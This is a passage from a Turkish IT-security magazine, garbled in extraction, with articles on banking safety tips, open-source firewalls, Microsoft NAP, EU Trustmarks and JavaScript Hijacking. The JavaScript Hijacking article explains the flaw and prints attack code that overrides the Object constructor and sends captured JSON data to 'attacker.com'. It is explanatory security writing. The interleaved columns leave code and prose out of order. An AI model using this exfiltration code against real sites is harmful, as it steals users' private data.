4. ‹nternet Cafe’ler, bilgisayar odalar› gibi topluma aç›k
bilgisayarlarda ‹nternet bankac›l›¤›n› ve e-ticaret sitelerini
kullanmaktan kaç›n›n.
5. Ayn› flifreleri uzun süre kullanmay›n.
Bugün ‹nternet’i hayat›m›zdan söküp atman›n, bilgisayarlarla
vedalaflman›n yolu yok. ‹nternet daha güvenli hale gelinceye
kadar, bundan daha iyisini de bulamayaca¤›z. O halde, uzmanlar›n
dediklerine kulak vermeli ve harfiyen yerine getirmeliyiz.
6. ‹nternet üzerinden gerçeklefltirece¤iniz ifllemler bitti¤inde,
ç›kmak için muhakkak "ÇIKIfi" ikonu kullan›larak oturumu kapat›n.
7. Bankan›z sunuyorsa tek kullan›ml›k dinamik flifreler türeten
elektronik cihazlar› kullan›n.
Bir baflka ifadeyle güvenli¤in afl›r›s›, hayat›m›z› çekilmez k›l›yor,
ömrümüzden ömür eksiltiyor. Fakat, uzmanlar bize iflkence
etmekten haz ald›klar› için mi bu kadar dikkatli olmam›z› istiyor?
Durun bir dakika, gerçekte bizim iyili¤imizi istiyor olmas›nlar?
8. Bir antivirüs ve güvenlik duvar› yaz›l›m› edinin ve s›k s›k
güncelleyin. Onlars›z ‹nternet’e ad›m›n›z› atmay›n. (Çok ciddiyiz.
Sözümüze güvenin.)
9. Web taray›c›lar›n›n ve iflletim sistemlerinin güvenlik yamalar›n›
mutlaka yükleyin.
Uzmanlar Hakl›…
Çünkü ‹nternet’in temeli, güvenlik aç›s›ndan deniz kumuyla
kar›lm›fl çimento kadar zay›f. So¤uk Savafl y›llar›nda Amerikan
Savunma Bakanl›¤› taraf›ndan gelifltirilen ve nükleer bir sald›r›da
ülke içi iletiflimin imkans›z hale gelmesi durumunda alternatif
yol olarak haberleflmeyi sa¤layacak bir a¤ görevi verilen
ARPANET’in temelinde, TCP/IP protokolü vard›. Proje, esas
olarak iletiflimin sa¤lanmas›n› amaçl›yordu. Ama iletiflimin
10. Al›flverifllerde mümkünse sanal kart ya da kap›da ödeme
seçeneklerini kullan›n.
Tim Berners Lee
Bafla gelen çekilir. “‹nternet 2” denen geliflmifl ve güvenli bir
sisteme geçene kadar sorunlarla yaflamay› ö¤renmeye ve
kendimizi korumaya mecburuz.
Agu’07 eskiz-6 7/31/07 12:35 AM Page 11
Afflin TAfiKIRAN – Ford Otosan
ataskira@ford.com.tr
Aç›k Kodlu Güvenlik Duvarlar›
Bilgisayar a¤lar›n›n ilk olufltu¤u günden bu yana, Unix sistemler bu a¤›n bir parças› olmufltur. Zamanla artan güvenlik
ihtiyaçlar› da Unix sistemler arac›l›¤› ile giderilmeye çal›fl›ld›.
Güvenlik duvarlar› ile birlikte elle tutulur ilk ihtiyaçlar Layer
3 ve 4 katman›nda filtreleme ifllemleriydi. Zaman ilerledikçe
talepler de artt› ve qos, yük dengeleme, cluster çal›flabilme,
kolay yönetilebilirlik gibi talepler bunlara eklendi.
Unix ve benzer sistemlerin büyük ço¤unlu¤u aç›k kod
lisanslar›n› kullanmakta ve güvenlik gereksinimlerini de aç›k
kodlu yaz›l›mlarla gidermektedir. Aç›k kod dünyas›nda
kullan›lan bafll›ca güvenlik duvar› yaz›l›mlar› ise Iptables,
Packet Filter, IPF ve IPFW’dir.
Iptables
Iptables, Linux çekirde¤indeki
Netfilter modüllerini kullanan
güvenlik duvar› yaz›l›m›d›r.
Netfilter ve Iptables, Linux 2.4 ve
2.6 çekirdek sürümlerinde
kullan›lmaktad›r. Daha önceki
çekirdek sürümleri olan 2.0’da
ipfwadm, 2.2 sürümlerinde ise
ipchains kullan›lm›flt›r. Iptables’›n öncekilerden en büyük
fark› ise durum korumas› özelli¤inin bulunmas›d›r.
IPFilter (IPF)
IPFilter, birçok unix türevinde kullan›labilen çok baflar›l› bir
TCP/IP paket filtreleme yaz›l›m›d›r. Günümüzde FreeBSD,
NetBSD, HP-UX ve Solaris 10 ile birlikte kullan›labilir flekilde
gelmektedir. Yüklenebilir çekirdek modülleri (Loadable Kernel
Module) olarak ya da çekirde¤e gömülü olarak kullanabilirsiniz.
IPF’i FreeBSD üzerinde kullanabilmek için afla¤›daki özellikleri
/etc/rc.conf dosyan›zda aktif etmelisiniz.
yeniden aktif etmek isterseniz afla¤›daki komutu kullanabilirsiniz.
IPFireWall (IPFW)
# ipf -Fa -f /etc/ipf.rules
OpenBSD Packet Filter (PF)
OpenBSD, dünyan›n en güvenli
iflletim sistemi olarak
bilinmekte. Öyle ki, son on y›l
içerisinde ön tan›ml› kurulumda dahi uzaktan eriflilebilir 2
güvenlik aç›¤› tespit edilmifltir.
OpenBSD, 2001 y›l›na kadar
IPF kullanmaktayd›. IPF’in 2001 y›l›nda yapt›¤› lisans
de¤iflikli¤inden sonra ise söz dizimi çok benzeyen ancak
kodlar› yeniden yaz›lm›fl olan Packet Filter’› tasarlad›. PF
daha sonra FreeBSD’de de çal›flabilecek hale getirildi.
Packet Filter, günümüzdeki ihtiyaçlara en iyi cevap verebilen,
modern bir güvenlik duvar›d›r. Temel güvenlik duvar›
ifllevlerinin yan› s›ra, yük dengeleme, paket normallefltirmesi,
güvenlik duvarlar›n›n ortak çal›flabilirli¤i, güvenlik duvar›
üzerinden kimlik do¤rulamas› gibi yeni nesil özelliklere
sahiptir. ALTQ ile geliflmifl band geniflli¤i yönetimi de yapabilir.
OpenBSD üzerinde Packet Filter’› kullanabilmek için
/etc/rc.conf dosyan›zda afla¤›daki de¤erleri ayarlamak
yeterlidir.
pf_enable=”YES”
pf_logd=”YES”
pf_conf=”/etc/pf.conf”
Di¤er güvenlik duvarlar›ndan en büyük fark› direkt olarak
çekirdek seviyesinde çal›flmas› ve yönetilmesi için ek bir
yaz›l›ma ihtiyaç duymamas›d›r. FreeBSD ile gelen standart
çekirdekte IPFW aktif de¤ildir. IPFW’yi kullanabilmeniz için
gerekli modülleri yüklemeniz yeterli olsa da sürekli
kullan›lacak bir sistem için çekirde¤i yeniden derlemeniz
önerilir.
fiekil: NetUstad Yönetim Paneli
Packet Filter için ise kapsaml› bir yönetim arayüzü olan
PFW’yi kullanman›z› öneririm.
IPFW’yi modül olarak eklemek için afla¤›daki yolu izleyebilirsiniz. Ancak unutulmamal›d›r ki IPFW’nin ön tan›ml› çal›flt›r›lmas›nda tüm trafik engellenecektir. Bu nedenle IPFW’nin
etkinlefltirilmesi s›ras›nda tüm trafi¤e izin verilebilir.
# kldload ipfw && ipfw add allow all from any to any
Kal›c› olarak IPFW’yi çal›flt›rmak isterseniz /etc/rc.conf
dosyas›na afla¤›daki sat›rlar› eklemeniz yeterlidir.
firewall_enable=”YES”
firewall_script=”/etc/rc.firewall”
IPFW ön tan›ml› yap›land›rma dosyas› /etc/rc.firewall’dur.
Güvenlik Duvar› Yönetim Arayüzleri
PF’in tüm yap›land›rmas› /etc/pf.conf dosyas› içerine yaz›l›r.
‹stedi¤iniz yap›land›rmay› gerçeklefltirdikten sonra PF’i
etkinlefltirmek için,
# pfctl –e
ipfilter_enable="YES"
ipfilter_rules="/etc/ipf.rules"
ipmon_enable="YES"
ipmon_flags="-Ds"
IPFireWall, FreeBSD ekibi taraf›ndan yürütülen bir güvenlik
duvar› projesidir.
devre d›fl› b›rakmak için ise,
Aç›k kodlu güvenlik duvarlar›n›n hemen hepsi konsoldan
yap›land›r›lmakta ve yönetilmektedir. Ticari amaçla kullan›lan
güvenlik duvarlar›n›n en büyük art›lar›ndan biri ise yönetilmelerinin kolay olmas›d›r. Ticari güvenlik duvar› liderlerinden
Check Point’in Smart Dashboard, Netscreen’in Netscreen
Security Manager gibi yönetim arayüzleri bulunmakta, bunlar
da güvenlik yöneticisinin iflini bir hayli kolaylaflt›rmaktad›r.
Ancak aç›k kodlu güvenlik duvarlar› için gelifltirilmifl yönetim
arayüzleri de bulunmaktad›r.
fiekil: PFW Yönetim Arayüzü
# pfctl –d
IPFW’un yönetilmesi için Netustad, Iptables’in yönetilmesi
için de fwbuilder gibi çok baflar›l› arayüzleri kullanabilirsiniz.
komutlar›n› yazman›z yeterlidir.
/etc/ipf.rules dosyan›za yazd›¤›n›z güvenlik duvar› kurallar›n›
Agu’07 eskiz-6 7/31/07 12:35 AM Page 12
Umut ‹NETAfi – Intertech
umut.inetas@intertech.com.tr
Microsoft Network Access
Protection (NAP)
Daha önceleri güvenlik konusu, Microsoft firmas›n›n en çok
elefltiri alan yanlar›ndan olan ama Bill Gates’in ”Güvenlik
bizim için birinci öncelikli konu olacakt›r” aç›klamas›yla yavafl
ancak emin ad›mlarla ilerlemeye bafllayan bir konuydu.
Microsoft’un güvenlik taraf›ndaki çözümleri, bu aç›klamayla
planlanmaya bafllayan ve yavafl yavafl meyvelerini toplamaya
bafllad›¤›m›z bu konunun ilk iflaretlerini; son kullan›c›dan en
üst katmanda güvenlik özelliklerine kadar, Forefront gibi
güvenlik ailesini tasarlayarak ve gerçekten güvenli¤in
sonradan eklenmedi¤i, her ad›mda tekrar karfl›m›za gelen,
uçtan uca güvenli bir platform tasarlayarak vermiflti.
Bu tasar›m›n belki de bizleri en çok ilgilendirecek ve gerçekten
önemli bir geliflme olarak nitelendirebilece¤imiz k›sm› ise
A¤ Eriflim Korumas› (NAP). Asl›nda Network Access Control
(NAC) olarak, baflka markalar ve baflka platformlar için de
benzer bir yap› bulunmakla beraber; Microsoft taraf›ndaki
NAP çözümünü di¤erlerinden ay›ran özellikler nelerdir,
bunlar› aç›klamaya çal›flal›m.
Neden NAP ?
NAP, temelde bir a¤ eriflim korumas› sa¤layan ve a¤a ba¤lanan bilgisayarlar› tan›mlanan politikalar dahilinde eriflim
kontrolü yaparak, onlar›n a¤a dahil olmas›na karar veren bir
çözümdür. Bu politikalar istenen antivirus yaz›l›m›n›n hangi
versiyonunun olmas›ndan, istenilen patch seviyesine ve hatta
windows firewall üzerinde hangi
portlar›n aç›k oldu¤u denetimine
kadar birçok çeflitli halde bulunmaktad›r.
Güvenlik yöneticilerinin asl›nda
yönetmekte en çok zorland›klar›
noktalar›n bafl›nda ortamlar›n›
en uç noktadan itibaren izleyememek ve a¤lar›na ba¤lanan
bilgisayarlar›n güvenlik seviyeleri
ile di¤er istenilen uygulamalar
üzerinde yeterince kontrole
sahip olamamak gelmekte. NAP
ve di¤er a¤ kontrol çözümleri bu
zay›fl›¤› ortadan kald›rmaya
yönelik olacakt›r.
Microsoft NAP çözümüne bak›ld›¤›nda, NAP mimarisi temelde
NAP istemci taraf›, NAP sunucu taraf›, iyilefltirme
(remediation) sunucular›, denetleyici ve politika düzenleyici
sunuculardan oluflmaktad›r. NAP EC ve NAP ES ad› verilen
sunucu ve istemci taraf›ndaki Windows tabanl› NAP uygulama
noktalar›, sunucu ve istemci aç›s›ndan ayn› olup; limitli a¤
eriflimini sa¤lama ve “non-compliant” (istenilen politikalara
uymayan - NC)istemcilerin ba¤lant› isteklerini karfl›lamaktad›r. SHA ve SHV (System Health Agent/Validator) istemcilerin istenilen politikalar› ve kriterleri sa¤lay›p sa¤lamad›¤›n›
kontrol eden modüllerdir. SHA ve iyilefltirme sunucular› hem
sistemin o anki durumunu, hem de istenen bir güvenli duruma
getirilmesi için neler yap›labilece¤i hak›nda bilgiler verir.
NAP çözümünün bütün ba¤lant›lar›n› da SSoH ve SSoHR
(System Statement Of Health Response) oluflturur. Windows
2003 özelliklerinden olan “Network Access Quarantine
Control” den oldukça farkl› olan NAP, flu anda 4 farkl› tip
çözümüyle, çeflitli kurumlar›n çeflitli ihtiyaçlar›na cevap
verebilecek fleklinde tasarlanm›flt›r. (fiekil 1)
NAP Modelleri
IPSec: IPsec iletiflimi HTTP ve HTTPS oturumlar› ile SSoH
ve SSoHR iletiflimini NAP istemcisi ve HRA (Health
Registration Authority) aras›nda sa¤lar. IPsec limitasyonu
sadece ilgili iyilefltirme sunucusundan gerekli politikalar›
alamayan NC istemciler için geçerlidir. Bu durumda, uygun
olmayan istemciler içerideki korunan a¤a eriflemez.
802.1X : NAP mimarisinin asl›nda en uygulanabilir olan ve
uygulanmas› gereken aya¤› 802.1X a¤ eriflim modelleridir.
802.1X destekli bir a¤ cihaz›n›n gönderdi¤i PEAP-TLV
paketleri, SSoH and SSoHR iletiflimini istemci ve sunucu
aras›nda sa¤lar. 802.1X a¤ iletiflimi k›s›tlamalar› 802.1X
destekli a¤ cihaz› üzerinde, IP paket filtrelemesi ile olup;
korunan a¤a eriflimi o a¤ baz›nda engeller ya da bir VLAN
ID tan›mlanarak a¤ trafi¤ini özel olarak tan›mlanm›fl belirli
bir VLAN üzerine yönlendirir.
VPN : Uzaktan VPN eriflimleri ise PEAP mesajlar› ile NAP
kullanabilen VPN istemcileri ve NAP NPS aras›nda ba¤lant›
kurmaya dayan›r. Bu uzaktan ba¤lant›lar›n limitleri IP paket
filtrelerine ve korunan iç a¤lara ulafl›m politikalar›na ba¤l›d›r.
DHCP : Hepimizin aflina oldu¤u DHCP ise kendi mesajlar› ile
beraber SSoH ve SsoHR mesajlar›n› tafl›r. DHCP a¤›n›n
limitasyonlar› IPv4 adres konfigurasyonlar› ile korunan iç
a¤lara ulafl›m politikalar›na ba¤l›d›r.
fiekil 1 NAP Mimarisi
Microsoft Network Access Protection (NAP)
fiekil 2 - IPSEC tabanl› NAP çal›flmas›
Güvenli A¤’a ba¤lanmak isteyen bir istemci ilk önce DHCP
sunucusundan IP al›r, daha sonra üzerinde çal›flan NAP client
ile HRA’a sa¤l›k durumunu gönderirir. HRA, merkezdeki IAS
sunucusu ile konuflarak ve politikalar› kontrol ederek,
istemcinin güvenli a¤a eriflmek için istenilen tüm politikalar›
yerine getirip getirmedi¤ine karar verir. E¤er istemci bu
politikalar› yerine getiriyorsa güvenli a¤a ba¤lanabilir, e¤er
herhangi bir update ihtiyac› varsa; iyilefltirme sunucusuna
yönlendirilerek bu update’leri (antivirüs, windows) almas›
sa¤lan›r. (fiekil 2)
Son olarak söyleyebiliriz ki, NAP ve di¤er a¤ eriflimi kontrol
yöntemleri 2007-2008 y›llar›nda biz güvenlikçilerin en çok
üzerinde u¤raflaca¤› ve yak›n bir zamanda standart hale
gelecek teknolojilerdir. Ya da Microsoft’un belirtti¤i gibi:
“NAP the WORLD in 2007”
Not: Daha bu yaz› haz›rlan›rken NAP resmi blog sitesinde 3
adet update olmas›, bu konunun flu anda ne kadar “hottopic” oldu¤unu göstermekte.
Microsoft Network Access Protection (NAP)
Agu’07 eskiz-6 7/31/07 12:35 AM Page 13
fierif TEKDAL – Red Biliflim
serif@redbilisim.com
JavaScript Hijacking
Çok say›daki zengin web uygulamas› (Yayg›n ad›yla Ajax
uygulamalar›), veri aktar›m metodu olarak JavaScript kullanmaya bafllad›. Bu yaz›da “Javascript Hijacking” olarak
adland›raca¤›m›z, JavaScript mesajlar› içindeki de¤erli ve
hassas bilgilerin yetkisiz kullan›c›lar taraf›ndan okunabilmesine olanak sa¤layan bir aç›ktan bahsedece¤iz. Geleneksel
web uygulamalar›, veri aktar›m› için JavaScript kullanmamas›
nedeniyle bu aç›ktan etkilenmiyorlar.
Bu konuyla ilgili yayg›n olarak kullan›lan 12 Ajax Framework
incelendi. Dördü sunucu tabanl› olmak üzere: Direct Web
Remoting (DWR), Microsoft ASP.NET AJAX (Yayg›n ad›yla
Atlas), XAJAX ve Google Web Toolkit (GWT). Kalan sekiz
tanesi de kullan›c› taraf›nda çal›flan kütüphaneler: Prototype,
Script.aculo.us, Dojo, Moo.fx, jQuery, Yahoo! UI, Rico ve
MochiKit. Bu inceleme sonucunda sadece DWR 2.0’›n
JavaScript Hijacking önleme mekanizmas› gelifltirdi¤i ortaya
ç›kt›. Di¤er frameworklerde bu konuyla ilgili bir koruma
olmad›¤› gibi, ilgili dökümanlar›nda da konudan bahsedilmiyor.
Yaz›l›m gelifltiren birçok kiflinin herhangi bir framework
kullanmad›¤›n› biliyoruz. Fakat yap›lan framework incelemelerinde ortaya ç›kan bulgular, framework kullanmadan
gelifltirilen özel uygulamalar›n ço¤unda da benzer aç›klar›n
oldu¤unu gösteriyor. E¤er uygulaman›z veri aktar›m› için
JavaScript kullan›yor, de¤erli ve hassas verilerle çal›fl›yorsa;
bu aç›ktan etkilenme olas›l›¤› bir hayli yüksek.
Web taray›c›lar›n›n, kullan›c›lar› kötü niyetli web sitelerinden
korumak için Ayn› Kaynak Politikas›’n› (Same Origin Policy)
kulland›klar›n› biliyoruz. Ayn› Kaynak Politikas›na göre,
JavaScript’in web sayfas›n›n içeriklerine eriflebilmesi için
hem JavaScript’in hem de web sayfas›n›n ayn› alan ad› kaynakl› olmas› gerekmektedir. Ayn› Kaynak Politikas› kullan›lmazsa, kötü niyetli bir web sitesi baflka bir kullan›c› tan›m›n›
kullanarak, JavaScript kodu çal›flt›rmak suretiyle baflka
sitelerdeki hassas bilgileri elde edebilir.
Hassas bilgilerin JavaScript ile iletildi¤i Web uygulamalar›nda,
kötü niyetli bir kullan›c› JavaScript Hijacking yoluyla Ayn›
Kaynak Politikas›’n› delebilir. Ayn› Kaynak Politikas›’ndaki
aç›k nokta, herhangi bir web sitesindeki JavaScript kodun,
// that whenever the "email" field is set, the method
baflka bir web sitesinin içeri¤ine dahil edilip çal›flt›r›labilmesine
izin vermesidir.
JavaScript haberleflmesi için en yayg›n format JSON
(JavaScript Object Notation) dur. JSON bir standart organizasyonu taraf›ndan kabul edilmifl ve kesin kurallarla tan›mlanm›fl bir standart olmasa da genel olarak JavaScript sentaks›n›n bir alt kümesi olarak kabul edilmektedir. JSON, iki tür
data yap›s›n› temel al›r: Diziler ve Nesneler. Mesajlar›n bir
veya daha fazla geçerli JavaScript ifadesi ile iletildi¤i veri
iletim formatlar›, JavaScript Hijacking’e karfl› korumas›zd›r.
JSON dizileri, geçerli bir JavaScript ifadesi olarak kendi
üzerinde bulunur. Bu nedenle JSON, JavaScript Hijacking’i
kolaylaflt›r›r. Baflka bir deyiflle, bir JSON dizisi JavaScript
Hijacking’e do¤rudan aç›kt›r. JSON nesneleri ise, geçerli bir
JavaScript ifadesi olarak kendi üzerinde bulunan baflka bir
JavaScript yap›s›n›n içine paketlendi¤i durumda, sald›r›lara
karfl› korumas›z kal›r.
// captureObject() will run. Since "email" is the final field,
...
// this will allow us to steal the whole object.
Host: www.example.com
function Object() {
Cookie:JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZ
this.email setter = captureObject;
Tr4a5YjaSbAiTnRR
}
// Send the captured object back to the attacker's Web site
(Bu ve takip eden örnekteki HTTP ç›kt›lar›nda, konu ile
do¤rudan ilgili olmayan HTTP header’lar› gösterilmemifltir.)
function captureObject(x) {
var objString = "";
Sunucu, JSON format›nda afla¤›daki gibi bir dizi ile cevap
verir:
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
HTTP/1.1 200 OK
objString += "email: " + x;
Cache-control: private
var req = new XMLHttpRequest();
Content-Type: text/javascript; charset=utf-8
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@fortifysoftware.com"
},
}
</script>

<script src="http://www.example.com/object.json"></script>
Afla¤›daki örnekte, öncelikle sat›fl kay›tlar›n›n yönetildi¤i bir
web uygulamas›n›n, istemci ile sunucu bileflenleri aras›ndaki
JSON haberleflmesi görülüyor. Hemen peflinden de istemci
gibi davranan bir sald›rgan›n, sunucunun gönderdi¤i hassas
verilere nas›l ulaflabildi¤ini görebilirsiniz.
{"fname":"Katrina",
‹stemci, sunucudan veri talep eder ve gelen sonucu ek’teki
kod ile JSON olarak de¤erlendirir.
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"lname":"O'Neil",
"phone":"6502135600",
" p u r c h a s e s " : 1 2 0 0 0 0 . 0 0 ,
"email":"katrina@fortifysoftware.com" },
"purchases":45000.00, "email":"jacob@fortifysoftware.com"
}]
var object;
var req = new XMLHttpRequest();
Bu örnekte JSON, sistemi kullanan kullan›c› ile iliflkili hassas
sat›fl bilgilerini içeriyor. Normal koflullarda, di¤er kullan›c›lar›n
bu bilgilere Oturum ID’sini bilmeden ulaflmalar› mümkün
de¤ildir. (Web uygulamalar›nda Oturum ID’si cookie olarak
tutulur.) Buna ra¤men kullan›c›, kötü niyetli bir web sitesini
ziyaret ederse; bu site JavaScript Hijacking yoluyla bilgilere
ulaflabilir.
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
E¤er kullan›c› afla¤›daki kodu içeren bir siteye girerse, bu
kullan›c›ya özel sat›fl verileri sald›rgan›n web sitesine
gönderilir.
}
};
req.send(null);
<script>
Kod çal›flt›r›ld›¤›nda afla¤›daki gibi bir HTTP talebi oluflturur:
GET /object.json HTTP/1.1
// override the constructor used to create all objects so
Kötü amaçl› kod, aç›k olan sayfaya JSON nesnesini eklemek
için script etiketini kullan›r. Baflka bir deyiflle, bu talep yasal
uygulama taraf›ndan yap›l›yormufl gibi de¤erlendirilecektir.
JSON dizisi istemciye ulaflt›¤›nda, kötü amaçl› web sitesinin
içeri¤indeymifl gibi de¤erlendirilecektir. Kötü amaçl› web
sayfas›, JSON’un nas›l oluflturuldu¤unu bulabilmek için
JavaScript fonksiyonlar›n› yeniden tan›mlar. Bu yolla kötü
amaçl› kod, her nesnenin oluflturulmas›na eriflim ve nesne
içeriklerinin siteye geri gönderebilmesine olanak sa¤layan
bir kanca atar.
*Mashup’larda kullan›lmak için gelifltirilen baz› uygulamalar,
her JavaScript mesaj›n›n sonunda bir callback fonksiyonu
ça¤›r›rlar. Callback fonksiyonu, mashup’daki baflka bir
uygulama taraf›ndan tan›mland›¤›n› gösterir. Callback
fonksiyonu kullan›lmas›, JavaScript Hijacking ataklar›n› son
derece basit bir hale getirir. Tek yap›lmas› gereken bir
fonksiyon tan›mlamaktan ibarettir. Bir uygulama ya mashup
uyumludur ya da güvenlidir. ‹kisinin bir arada olmas› ise
mümkün de¤ildir.
*Birden fazla kaynaktan toplad›¤› içerikleri derleyen web siteleri veya
uygulamalar.
Agu’07 eskiz-6 7/31/07 12:35 AM Page 14
Dr. Leyla Keser BERBER – ‹stanbul Bilgi Üniversitesi
lkeser@bilgi.edu.tr
Trustmark
Bu akreditasyon flemalar› Trustmark’›n belirli kriterleri yerine
getirip getirmedi¤ine iliflkindir. Trustmark Akreditasyon
fiemas› Trustmark’da uygulanacak olan isterler ve özellikler
için de kaynak olarak hizmet edecektir.
AB Trustmark ‹sterleri
Trustmark’›n kullan›m› yoluyla e-Ticarette bir self regülasyon
yap›lmas› 90’lar›n sonlar›ndan itibaren gündemdeydi. Bu
y›llarda bir dizi Trustmark kurulmufl ve Trustmarklar ve di¤er
etiketler iflletmelerin web sayfalar›nda art›k daha s›k görülmeye bafllanm›flt›.
Trustmark, e-Ticaret ba¤lam›nda uzun y›llar güvenin sa¤lanmas› ölçütü olarak tart›fl›lm›flt›r.
e-Ticarette tüketici güveninin sa¤lanmas›n›n veya gelifltirilmesinin di¤er birçok yolu mevcuttur. Trustmark daha çok
self regülasyona iliflkin genel tart›flmalarda rol oynamaktad›r.
Terminoloji ve Trustmark’lar›n Karakteristikleri
bir alternatif uyuflmazl›k çözüm sistemi sunmaya kadar çok
farkl› seçenekler ihtiva etmektedir. Tazminat mekanizmas›
tüketicinin tazminat isteyebilece¤i durumlarda üçüncü taraf
garantisi niteli¤inde de olabilir.
Birçok durumda tüketici, davran›fl kurallar› hakk›nda bilgiyi
web sayfas›ndaki Trustmark etiketini t›klayarak alabilir.
Genel olarak Trustmark organizasyonu web sayfas›nda onayl›
iflletmelerin ve/veya web sayfalar›n›n bir listesini yay›nlar.
Bu anlamda Trustmark sayfas› ayn› zamanda tüketicinin,
belirli bir davran›fl kural› do¤rultusunda onayl› iflletmeleri
de bulabilece¤i bir al›flverifl portal› ifllevini de görecektir.
Trustmark’›n ay›rd edici karakterlerinden biri, elektronik bir
etiket olarak web sayfalar›nda yer almas›d›r. Genel olarak
web sayfas›n› kullanan kifliler üzerinde güven uyand›rmak
için bir dizi kuraldan oluflmaktad›r.
e-Ticarete iliflkin Trustmark’›n d›fl›nda, iflletmelerin web
sayfalar›na koyabilecekleri çok farkl› etiketler söz konusudur.
Bu etiketler ifl süreçlerine (ISO sertifikalar›), güvenlik ve
flifreleme (örne¤in VeriSign), ödeme (Visa, MasterCard),
mahremiyet, logistik, web site içerik veya sosyal fark›ndal›k
konular›na iliflkin olabilir.
Kullan›c› tüketicidir. (B2C ticaret)*
Trustmark Akreditasyon fiemas›
Trustmark tafl›yan iflletmeler, bir Trustmark organizasyonu
taraf›ndan (sertifikalama otoritesi) onayland›klar›na dair
“onayl› iflletme” iflareti tafl›rlar.
Trustmark, onayl› iflletmenin karfl›lamas› gereken bir dizi
gereklilik ortaya koymaktad›r. Bu tür Trustmark’lar Trustmark
Akreditasyon fiemas› do¤rultusunda onaylan›rlar.
Ancak baz› Trustmark’lar self deklarasyon
karakterlidirler. Yani herhangi bir inceleme
veya onaya ihtiyaç duymazlar.
ETR, online mal sat›fl› uygulamas› için bir temel önermekte
ve AB seviyesinde herhangi bir emredici hükmün yerine
geçmek veya bu hükümleri ihlal etmek fleklinde bir içeri¤e
sahip de¤ildir.
Trustmark flemalar› ETR’yi karfl›lamak veya aflmak konusunda
teflvik edicidir. Bu isterler do¤rudan tüketiciye yönelik olan
e-Ticaret için (B2C) genel Trustmark’lar› hedeflemektedir.
AB Trustmark ‹sterleri afla¤›daki konulara iliflkindir:
Euro-Label Trustmark’›n› alabilmek ve perakende ifllemler
için tacirlerin, Avrupa Davran›fl Kurallar›n› yerine getirmesi
gerekir.
Euro-Label organizasyonu tacirlerin bu Davran›fl Kurallar›na
uyup uymad›¤›n› kontrol etmekle yükümlüdür.
Avrupa Davran›fl Kurallar› EU mevzuat›na göre kaleme
al›nm›flt›r. Özellikle e-Ticaret’e, uzaktan sat›fllara, kiflisel
verilerin korunmas›na ve garantilere iliflkin AB Direktifleri
göz önünde bulundurulmufltur. Mekanizma logoyu web
sitesinde tafl›yan tacirin güvenilir oldu¤unu ortaya
koymaktad›r.
Euro-Label:
1. Trustmark flemalar›nda yüksek standart,
ölçülebilirlik ve amaç
2. Tüketiciler ve iflletmeler için Trustmark flemalar›n›n fleffaf
olmas›
3. Tüketiciler ve iflletmeler için Trustmark flemalar›n›n
eriflilebilir ve görünebilir olmas›
• fiirketin satt›¤› ürünün güvenilir oldu¤unu,
• Sat›fl koflullar›n›n web sayfas›nda herkese aç›k ve eriflilebilir
oldu¤unu,
• Tacirin kiflisel verilerin korunmas› mevzuat›na uydu¤unu,
• Müflterinin siparifl verdi¤i ürünün teslim edilece¤ini,
• ‹fllem boyunca herhangi bir aksakl›k oldu¤unda, bir
alternatif uyuflmazl›k çözüm mekanizmas›n›n devreye
girece¤ini sa¤lamaya çal›flmaktad›r.
4. Trustmark flemalar›n›n kapsam› ve içeri¤i
5. Trustmark flemalar›n›n çal›flma flekli
6. Trustmark flemalar› için baflvuru sahiplerinin
de¤erlendirilmesi
Genel olarak Trustmark organizasyonu,
müracaat eden iflletmenin web sayfas›n›
yeniden inceleme iflini gerçeklefltirir.
Onayl› iflletme ile Trustmark organizasyonu
aras›nda davran›fl kurallar›n›n yorumuna
iliflkin olarak uyuflmazl›k ç›kt›¤› takdirde,
bir onay komitesi veya bir dan›flma kurulu,
sorun hakk›nda karar verebilmektedir.
Baz› Trustmarklar tüketici haklar›n›n yerine
getirilmesi, yani onayl› iflletme ve tüketici
aras›ndaki uyuflmazl›¤›n çözülmesi
özelli¤ine sahiptir.
Bu özellikler tüketicinin dava açmas›
ihtimalinde destek hizmetinden, komple
7. Denetleme sistemi
8. ‹cra sistemi
Euro-Label Trustmark, bizatihi bir Trustmark olarak ve bir
“fiemsiye Trustmark” olarak alg›lanabilir. Farkl› ülkelerde
farkl› etiketler mevcut olmas›na ra¤men, tüm etiketler Avrupa
Davran›fl Kurallar› do¤rultusunda ortak özellikler
tafl›maktad›rlar. Her ülke onaylad›¤› iflletmenin davran›fl
kurallar›na ba¤l› oldu¤unu sa¤lamaya çal›fl›r ancak bu her
bir ülkenin Trustmark için ek koflullar aramas›na da engel
de¤ildir. Euro-Label Trustmark, 7 AB ülkesinde mevcuttur.
(Avusturya, Fransa, Almanya, ‹talya, Malta, ‹spanya ve
Polonya) Euro-Label’in amac› tüm AB ülkelerine yay›lmakt›r.
9. Teknik güvenlik
Euro-Label
Euro-Label3 AB’nin tüketiciler ve
perakende sat›c›lar› için gelifltirdi¤i
elektronik Trustmark’t›r. Amac›
online ticaret için güvenilir ve adil
bir ortak temelin mevcudiyetini
Trustmark
AB Trustmark ‹sterleri (ETR), elektronik ticarette tüketicinin
korunmas› bak›m›ndan yüksek standartlar sa¤lamak ve mal
ve hizmetlerin internet üzerinden sat›fl›n› teflvik etmek
amac›yla BEUC 1 ve UNICE 2 taraf›ndan haz›rlanm›flt›r.
temin ederek, Avrupa içindeki elektronik ulusal ve s›n›r ötesi
elektronik ifllemlerin artmas›n› teflvik etmektir. Euro-Label
AB Komisyonun finansal katk›s› ile kurulmufltur. Avusturya,
Fransa, Almanya, ‹talya, Malta, ‹spanya ve Polonya’dan
profesyonel kurulufllar, Euro-Label organizas-yonuna ve
ayn› zamanda EuroCommerce’e taraft›rlar.
[1] www.beuc.org
[2] www.unice.org
[3] www.euro-label.com
*Business to customer – Firmadan müflteriye e-Ticaret
Trustmark
Agu’07 eskiz-6 7/31/07 12:35 AM Page 15
Murat LOSTAR – Lostar Bilgi Güvenli¤i
murat@lostar.com
Bilgi Güvenli¤i’nin Organizasyonu
ve Koordinasyonu
TS ISO/IEC 27001:2005-A.6.1
TS ISO/IEC 27001:2005 standard›n›n kontrol hedefleri ve
